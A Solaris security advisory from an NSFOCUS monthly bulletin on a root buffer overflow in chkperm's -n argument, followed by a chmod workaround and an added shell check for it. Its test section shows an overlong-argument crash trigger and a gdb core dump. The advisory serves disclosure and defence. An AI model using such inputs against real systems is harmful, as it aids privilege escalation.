NSFOCUS Security Monthly -> Issue 5 -> Latest Vulnerabilities
Solaris chkperm Buffer Overflow Vulnerability

Homepage: http://www.nsfocus.com/
Date: 1999-12-14

Published: 2000-1-7
Updated: 2000-1-7
Affected systems:
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86HW5/98
Sun Solaris 2.6_x86HW3/98
Sun Solaris 2.6_x86
Sun Solaris 2.6HW5/98
Sun Solaris 2.6HW3/98
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1_ppc
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
--------------------------------------------------------------------------------

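Description:

Sun's '/usr/vmsys/bin/chkperm' program contains a buffer overflow vulnerability. By supplying
a string containing carefully crafted executable code to chkperm's '-n' argument, an attacker can execute arbitrary commands as root.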

--------------------------------------------------------------------------------

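Test program:

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!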


[Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
Segmentation fault (core dumped)
[hackerslab:/users/loveyou/buf]$ gdb chkperm core
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (sparc-sun-solaris2.5.1),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxx'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0 0xef73ea68 in nvmatch ()

--------------------------------------------------------------------------------
Recommendation:
Temporary workaround:
chmod 400 /usr/vmsys/bin/chkperm
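
A check for the workaround above, as an added example that is not part of the original advisory: the shell function below reports whether a file still carries a set-uid/set-gid bit or any execute bit, all of which `chmod 400` clears. The function name `check_chkperm` and its status words are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the advisory): verify that the chmod 400 workaround
# is in effect for a given path. Status words are this example's own choice.
#   absent      - file does not exist, nothing to mitigate          (returns 0)
#   mitigated   - no set-uid/set-gid bit and no execute bit         (returns 0)
#   setid       - set-uid or set-gid bit still present              (returns 1)
#   executable  - at least one execute bit still present            (returns 1)
#   not-regular - symlink or special file, needs manual inspection  (returns 2)

check_chkperm() {
    target=$1

    if [ -h "$target" ]; then
        echo "not-regular"
        return 2
    fi
    if [ ! -e "$target" ]; then
        echo "absent"
        return 0
    fi
    if [ ! -f "$target" ]; then
        echo "not-regular"
        return 2
    fi

    # POSIX find: "-perm -MODE" matches when every bit in MODE is set.
    for bit in 4000 2000; do
        if [ -n "$(find "$target" -prune -perm -"$bit" -print)" ]; then
            echo "setid"
            return 1
        fi
    done
    for bit in 0100 0010 0001; do
        if [ -n "$(find "$target" -prune -perm -"$bit" -print)" ]; then
            echo "executable"
            return 1
        fi
    done

    echo "mitigated"
    return 0
}
```

Call it as `check_chkperm /usr/vmsys/bin/chkperm` after applying the workaround, and again after any patch or package reinstall, since those may restore the original mode.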
